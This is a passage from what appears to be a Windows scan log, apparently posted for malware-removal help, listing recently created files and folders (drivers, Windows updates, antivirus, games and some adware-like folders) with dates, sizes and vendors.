000,264,616 | ---- | C] (Oracle Corporation) -- C:\windows\SysWow64\javaws.exe [2014-06-04 11:10:48 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\windows\SysWow64\javaw.exe [2014-06-04 11:10:48 | 000,175,016 | ---- | C] (Oracle Corporation) -- C:\windows\SysWow64\java.exe [2014-06-04 11:10:48 | 000,096,168 | ---- | C] (Oracle Corporation) -- C:\windows\SysWow64\WindowsAccessBridge-32.dll [2014-06-03 20:42:56 | 000,000,000 | ---D | C] -- C:\Users\Marcin\Desktop\test_Data [2014-06-03 20:14:03 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spolszczenie do Sid Meier's Pirates instalka by Termez & AliG [2014-06-03 20:14:03 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spolszczenie do Sid Meier's Pirates instalka by Termez & AliG [2014-06-03 20:13:17 | 000,000,000 | ---D | C] -- C:\Users\Marcin\Desktop\Sid_Meiers_Pirates_pl [2014-06-03 17:22:25 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\predm [2014-06-03 17:14:58 | 000,000,000 | ---D | C] -- C:\ProgramData\WindowsProtectManger [2014-06-03 17:14:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SupTab [2014-06-03 17:14:57 | 000,000,000 | ---D | C] -- C:\ProgramData\IePluginServices [2014-06-03 11:06:19 | 000,061,112 | ---- | C] (StdLib) -- C:\windows\SysNative\drivers\{0c0bb4a8-45a4-4685-9c1d-08d98af4b926}w64.sys [2014-06-02 21:29:20 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks [2014-06-02 20:44:54 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\trolatunt [2014-06-02 20:42:22 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\DAEMON Tools Lite [2014-06-02 20:42:00 | 000,000,000 | ---D | C] -- C:\ProgramData\DAEMON Tools Lite [2014-06-02 19:29:33 | 001,715,176 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvspbridge64.dll [2014-06-02 19:29:33 | 001,291,232 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvspbridge.dll [2014-06-02 18:38:08 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner [2014-06-02 18:38:07 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner [2014-06-02 18:37:25 | 004,748,896 | ---- | C] (Piriform Ltd) -- C:\Users\Marcin\Desktop\ccsetup414.exe [2014-05-26 21:35:15 | 000,000,000 | ---D | C] -- C:\windows\SysWow64\NV [2014-05-26 21:35:15 | 000,000,000 | ---D | C] -- C:\windows\SysNative\NV [2014-05-26 21:27:32 | 031,387,936 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvoglv64.dll [2014-05-26 21:27:32 | 016,003,912 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvwgf2um.dll [2014-05-26 21:27:32 | 011,599,072 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvopencl.dll [2014-05-26 21:27:32 | 009,697,640 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvopencl.dll [2014-05-26 21:27:32 | 000,895,776 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\NvIFR64.dll [2014-05-26 21:27:32 | 000,867,784 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\NvIFR.dll [2014-05-26 21:27:32 | 000,382,240 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\NvIFROpenGL.dll [2014-05-26 21:27:32 | 000,354,016 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvoglshim64.dll [2014-05-26 21:27:32 | 000,335,704 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\NvIFROpenGL.dll [2014-05-26 21:27:32 | 000,305,600 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvoglshim32.dll [2014-05-26 21:27:32 | 000,032,544 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\drivers\nvpciflt.sys [2014-05-26 21:27:31 | 025,256,224 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvcompiler.dll [2014-05-26 21:27:31 | 017,561,544 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvcompiler.dll [2014-05-26 21:27:31 | 011,644,928 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvcuda.dll [2014-05-26 21:27:31 | 009,735,256 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvcuda.dll [2014-05-26 21:27:31 | 003,141,976 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvcuvid.dll [2014-05-26 21:27:31 | 002,953,672 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvcuvid.dll [2014-05-26 21:27:31 | 002,785,568 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvcuvenc.dll [2014-05-26 21:27:31 | 002,412,376 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvcuvenc.dll [2014-05-26 21:27:31 | 001,889,112 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvdispco6433788.dll [2014-05-26 21:27:31 | 001,541,576 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvdispgenco6433788.dll [2014-05-26 21:27:31 | 000,892,704 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\NvFBC64.dll [2014-05-26 21:27:31 | 000,861,128 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\NvFBC.dll [2014-05-26 21:27:31 | 000,492,376 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysNative\nvEncodeAPI64.dll [2014-05-26 21:27:31 | 000,416,712 | ---- | C] (NVIDIA Corporation) -- C:\windows\SysWow64\nvEncodeAPI.dll [2014-05-26 15:27:47 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\AVAST Software [2014-05-26 15:27:26 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast [2014-05-26 15:26:45 | 001,039,096 | ---- | C] (AVAST Software) -- C:\windows\SysNative\drivers\aswsnx.sys.1401110830718 [2014-05-26 15:26:45 | 001,039,096 | ---- | C] (AVAST Software) -- C:\windows\SysNative\drivers\aswsnx.sys [2014-05-26 15:26:45 | 000,423,240 | ---- | C] (AVAST Software) -- C:\windows\SysNative\drivers\aswsp.sys.1401110830718 [2014-05-26 15:26:45 | 000,423,240 | ---- | C] (AVAST Software) -- C:\windows\SysNative\drivers\aswsp.sys [2014-05-26 15:26:45 | 000,093,568 | ---- | C] (AVAST Software) -- C:\windows\SysNative\drivers\aswRdr2.sys [2014-05-26 15:26:45 | 000,085,328 | ---- | C] (AVAST Software) -- C:\windows\SysNative\drivers\aswstm.sys [2014-05-26 15:26:45 | 000,079,184 | ---- | C] (AVAST Software) -- C:\windows\SysNative\drivers\aswMonFlt.sys [2014-05-26 15:26:44 | 000,334,648 | ---- | C] (AVAST Software) -- C:\windows\SysNative\aswBoot.exe [2014-05-26 15:26:35 | 000,043,152 | ---- | C] (AVAST Software) -- C:\windows\avastSS.scr [2014-05-26 15:26:07 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software [2014-05-26 15:24:20 | 000,000,000 | ---D | C] -- C:\ProgramData\AVAST Software [2014-05-23 10:46:06 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\App Launcher Gadget [2014-05-23 10:43:03 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Local\Clipboarder [2014-05-23 10:42:31 | 000,000,000 | ---D | C] -- C:\Users\Marcin\Desktop\Karolina [2014-05-23 10:02:21 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Local\Sidebar7 [2014-05-23 10:00:59 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\8GadgetPack [2014-05-22 15:00:46 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Selteco [2014-05-22 14:59:48 | 000,000,000 | -HSD | C] -- C:\Users\Marcin\AppData\Local\EmieUserList [2014-05-22 14:59:48 | 000,000,000 | -HSD | C] -- C:\Users\Marcin\AppData\Local\EmieSiteList [2014-05-21 22:50:03 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Local\AVG [2014-05-21 22:50:02 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\AVG [2014-05-21 22:48:36 | 000,000,000 | ---D | C] -- C:\ProgramData\AVG [2014-05-21 22:48:31 | 000,000,000 | -HSD | C] -- C:\ProgramData\{01BD4FC9-2F86-4706-A62E-774BB7E9D308} [2014-05-21 22:48:31 | 000,000,000 | -H-D | C] -- C:\ProgramData\Common Files [2014-05-18 19:23:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud [2014-05-17 16:36:57 | 000,000,000 | ---D | C] -- C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenTK [2014-05-17 16:36:30 | 000,000,000 | ---D | C] -- C:\Users\Marcin\Documents\OpenTK [2014-05-16 06:44:42 | 000,308,224 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wusa.exe [2014-05-16 06:44:42 | 000,305,152 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wusa.exe [2014-05-16 06:44:40 | 000,257,880 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\WdFilter.sys [2014-05-16 06:44:39 | 000,123,224 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\WdNisDrv.sys [2014-05-16 06:44:38 | 000,035,856 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\WdBoot.sys [2014-05-16 06:44:12 | 000,190,976 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\storewuauth.dll [2014-05-16 06:44:11 | 013,288,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\twinui.dll [2014-05-16 06:44:11 | 011,792,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\twinui.dll [2014-05-16 06:44:10 | 001,705,472 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wucltux.dll [2014-05-16 06:44:10 | 000,921,088 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WSShared.dll [2014-05-16 06:44:10 | 000,754,688 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\WSShared.dll [2014-05-16 06:44:10 | 000,381,440 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WUSettingsProvider.dll [2014-05-16 06:44:10 | 000,201,728 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ubpm.dll [2014-05-16 06:44:09 | 001,054,208 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\twinui.appcore.dll [2014-05-16 06:44:09 | 000,828,928 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\twinui.appcore.dll [2014-05-16 06:44:09 | 000,827,392 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wuapi.dll [2014-05-16 06:44:09 | 000,666,624 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wuapi.dll [2014-05-16 06:44:09 | 000,555,736 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\twinapi.appcore.dll [2014-05-16 06:44:09 | 000,419,928 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\twinapi.appcore.dll [2014-05-16 06:44:09 | 000,056,320 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wups.dll [2014-05-16 06:44:09 | 000,054,776 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wuauclt.exe [2014-05-16 06:44:08 | 000,249,344 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.ApplicationModel.Store.TestingFramework.dll [2014-05-16 06:44:08 | 000,189,952 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.ApplicationModel.Store.TestingFramework.dll [2014-05-16 06:44:08 | 000,137,728 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wuwebv.dll [2014-05-16 06:44:08 | 000,123,904 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wuwebv.dll [2014-05-16 06:44:08 | 000,093,696 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wudriver.dll [2014-05-16 06:44:08 | 000,080,896 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wudriver.dll [2014-05-16 06:44:08 | 000,079,872 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WSReset.exe [2014-05-16 06:44:08 | 000,035,328 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wuapp.exe [2014-05-16 06:44:08 | 000,031,232 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wuapp.exe [2014-05-16 06:44:08 | 000,025,088 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wups.dll [2014-05-16 06:43:14 | 000,084,992 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mshtmled.dll [2014-05-16 06:43:13 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mshtmled.dll [2014-05-16 06:42:58 | 000,086,688 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mrt_map.dll [2014-05-16 06:42:58 | 000,080,032 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mrt_map.dll [2014-05-16 06:42:58 | 000,028,320 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mrt100.dll [2014-05-16 06:42:58 | 000,026,784 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mrt100.dll [2014-05-15 11:57:34 | 000,105,464 | ---- | C] (Adobe Systems Incorporated) -- C:\windows\SysWow64\FlashPlayerCPLApp.cpl [2014-05-15 11:57:33 | 000,693,240 | ---- | C] (Adobe Systems Incorporated) -- C:\windows\SysWow64\FlashPlayerApp.exe [2014-05-14 16:04:26 | 000,195,584 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msrating.dll [2014-05-14 16:04:26 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\msrating.dll [2014-05-14 16:01:36 | 000,792,576 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\autochk.exe [2014-05-14 16:01:36 | 000,350,720 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\srchadmin.dll [2014-05-14 16:01:36 | 000,082,432 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\IdCtrls.dll [2014-05-14 16:01:35 | 000,752,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\jscript9diag.dll [2014-05-14 16:01:35 | 000,576,512 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SettingSync.dll [2014-05-14 16:01:35 | 000,112,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\DAMM.dll [2014-05-14 16:01:35 | 000,092,672 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dafBth.dll [2014-05-14 16:01:35 | 000,059,392 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Networking.Sockets.PushEnabledApplication.dll [2014-05-14 16:01:35 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\iernonce.dll [2014-05-14 16:01:34 | 005,784,064 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\jscript9.dll [2014-05-14 16:01:34 | 000,610,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sud.dll [2014-05-14 16:01:34 | 000,559,104 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\UserLanguagesCpl.dll [2014-05-14 16:01:34 | 000,140,800 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SkyDriveShell.dll [2014-05-14 16:01:32 | 002,428,928 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ExplorerFrame.dll [2014-05-14 16:01:32 | 001,621,504 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\RacEngn.dll [2014-05-14 16:01:30 | 000,690,688 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MrmIndexer.dll [2014-05-14 16:01:30 | 000,630,784 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\OobeFldr.dll [2014-05-14 16:01:30 | 000,591,872 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aepdu.dll [2014-05-14 16:01:30 | 000,527,360 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aeinv.dll [2014-05-14 16:01:30 | 000,385,024 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\devinv.dll [2014-05-14 16:01:30 | 000,183,808 | ---- | C] (Microsoft Corp.) -- C:\windows\SysNative\Defrag.exe [2014-05-14 16:01:30 | 000,148,992 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sppnp.dll [2014-05-14 16:01:30 | 000,128,512 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\microsoft-windows-kernel-power-events.dll [2014-05-14 16:01:30 | 000,109,568 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dwm.exe [2014-05-14 16:01:30 | 000,109,568 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\CloudStorageWizard.exe [2014-05-14 16:01:30 | 000,095,744 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aepic.dll [2014-05-14 16:01:29 | 011,742,720 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\glcndFilter.dll [2014-05-14 16:01:29 | 000,123,904 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\LockScreenContent.dll [2014-05-14 16:01:29 | 000,059,392 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ConfigureExpandedStorage.dll [2014-05-14 16:01:28 | 001,136,128 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wscui.cpl [2014-05-14 16:01:28 | 000,315,904 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\synthstor.dll [2014-05-14 16:01:28 | 000,136,192 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\psmsrv.dll [2014-05-14 16:01:28 | 000,109,568 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wscinterop.dll [2014-05-14 16:01:28 | 000,106,496 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\setupugc.exe [2014-05-14 16:01:28 | 000,032,256 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\JavaScriptCollectionAgent.dll [2014-05-14 16:01:27 | 000,968,704 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\tdh.dll [2014-05-14 16:01:27 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieetwcollector.exe [2014-05-14 16:01:27 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieetwproxystub.dll [2014-05-14 16:01:27 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieetwcollectorres.dll [2014-05-14 16:01:26 | 008,874,496 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Data.Pdf.dll [2014-05-14 16:01:25 | 000,655,360 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\cscui.dll [2014-05-14 16:01:25 | 000,071,888 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\dumpfve.sys [2014-05-14 16:01:25 | 000,030,208 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SettingSyncPolicy.dll [2014-05-14 16:01:24 | 000,997,888 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\reseteng.dll [2014-05-14 16:01:24 | 000,188,464 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\systemreset.exe [2014-05-14 16:01:24 | 000,027,480 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SysResetErr.exe [2014-05-14 16:01:20 | 000,399,872 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\das.dll [2014-05-14 16:01:20 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dasHost.exe [2014-05-14 16:01:20 | 000,055,296 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AepRoam.dll [2014-05-14 16:01:20 | 000,038,400 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\deviceassociation.dll [2014-05-14 16:01:19 | 000,592,896 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\jscript9diag.dll [2014-05-14 16:01:19 | 000,488,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winspool.drv [2014-05-14 16:01:18 | 000,747,008 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wlidcli.dll [2014-05-14 16:01:17 | 000,269,312 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\PlayToDevice.dll [2014-05-14 16:01:16 | 000,630,272 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\OobeFldr.dll [2014-05-14 16:01:16 | 000,388,408 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\bcryptprimitives.dll [2014-05-14 16:01:14 | 000,391,008 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MMDevAPI.dll [2014-05-14 16:01:14 | 000,135,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\fsutil.exe [2014-05-14 16:01:14 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\LockScreenContentHost.dll [2014-05-14 16:01:12 | 000,647,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SettingSyncHost.exe [2014-05-14 16:01:12 | 000,211,968 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Dism.exe [2014-05-14 16:01:12 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ieetwproxystub.dll [2014-05-14 16:01:10 | 000,832,512 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ActionCenter.dll [2014-05-14 16:01:10 | 000,589,312 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\vdsdyn.dll [2014-05-14 16:01:10 | 000,232,896 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\sqmapi.dll [2014-05-14 16:01:10 | 000,165,376 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\bcdboot.exe [2014-05-14 16:01:10 | 000,127,488 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\occache.dll [2014-05-14 16:01:09 | 001,728,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dui70.dll [2014-05-14 16:01:09 | 001,356,360 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winresume.exe [2014-05-14 16:01:09 | 000,116,736 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\pnpclean.dll [2014-05-14 16:01:08 | 002,165,760 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\SyncCenter.dll [2014-05-14 16:01:08 | 001,659,056 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winload.efi [2014-05-14 16:01:08 | 001,519,592 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winload.exe [2014-05-14 16:01:08 | 001,487,520 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winresume.efi [2014-05-14 16:01:08 | 000,584,704 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\StructuredQuery.dll [2014-05-14 16:01:08 | 000,032,544 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\UserAccountBroker.exe [2014-05-14 16:01:07 | 000,292,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ninput.dll [2014-05-14 16:01:07 | 000,209,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\imm32.dll [2014-05-14 16:01:07 | 000,083,120 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\taskhost.exe [2014-05-14 16:01:07 | 000,080,048 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\taskhostex.exe [2014-05-14 16:01:07 | 000,071,680 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\StorageContextHandler.dll [2014-05-14 16:01:07 | 000,015,872 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\slpts.dll [2014-05-14 16:01:06 | 000,152,064 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dwmredir.dll [2014-05-14 16:01:06 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\deviceassociation.dll [2014-05-14 16:01:04 | 002,100,736 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SystemSettingsAdminFlowUI.dll [2014-05-14 16:01:04 | 000,660,480 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Devices.Bluetooth.dll [2014-05-14 16:01:03 | 000,628,224 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msTextPrediction.dll [2014-05-14 16:01:03 | 000,258,784 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SystemSettingsAdminFlows.exe [2014-05-14 16:01:03 | 000,208,896 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\PlayToManager.dll [2014-05-14 16:01:03 | 000,017,920 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\sxshared.dll [2014-05-14 16:01:02 | 000,551,424 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wimgapi.dll [2014-05-14 16:01:02 | 000,544,768 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wlidcli.dll [2014-05-14 16:01:02 | 000,424,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\hal.dll [2014-05-14 16:01:02 | 000,245,248 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\microsoft-windows-system-events.dll [2014-05-14 16:01:02 | 000,047,104 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\offreg.dll [2014-05-14 16:01:01 | 000,191,488 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rpchttp.dll [2014-05-14 16:00:58 | 000,356,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\conhost.exe [2014-05-14 16:00:57 | 001,576,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wlidsvc.dll [2014-05-14 16:00:57 | 000,467,456 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\energy.dll [2014-05-14 16:00:56 | 000,053,248 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\acppage.dll [2014-05-14 16:00:55 | 001,428,480 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\RecoveryDrive.exe [2014-05-14 16:00:55 | 000,943,104 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\WlanMM.dll [2014-05-14 16:00:55 | 000,645,104 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SHCore.dll [2014-05-14 16:00:55 | 000,410,568 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\WerFault.exe [2014-05-14 16:00:55 | 000,369,288 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Faultrep.dll [2014-05-14 16:00:55 | 000,033,056 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\WerFaultSecure.exe [2014-05-14 16:00:53 | 000,439,808 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Devices.Bluetooth.dll [2014-05-14 16:00:52 | 000,270,336 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\winsku.dll [2014-05-14 16:00:52 | 000,163,328 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ocsetapi.dll [2014-05-14 16:00:52 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieUnatt.exe [2014-05-14 16:00:52 | 000,082,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\spbcd.dll [2014-05-14 16:00:52 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\winbrand.dll [2014-05-14 16:00:51 | 000,924,504 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\refs.sys [2014-05-14 16:00:51 | 000,156,672 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\RelPost.exe [2014-05-14 16:00:51 | 000,098,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\netid.dll [2014-05-14 16:00:50 | 000,779,264 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\osk.exe [2014-05-14 16:00:50 | 000,473,600 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\AppxPackaging.dll [2014-05-14 16:00:50 | 000,173,056 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dmvdsitf.dll [2014-05-14 16:00:50 | 000,159,232 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\werui.dll [2014-05-14 16:00:50 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\DAConn.dll [2014-05-14 16:00:49 | 000,548,352 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\vbscript.dll [2014-05-14 16:00:49 | 000,413,184 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wow64win.dll [2014-05-14 16:00:49 | 000,076,288 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\BulkOperationHost.exe [2014-05-14 16:00:48 | 000,290,816 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mdmregistration.dll [2014-05-14 16:00:48 | 000,207,872 | ---- | C] 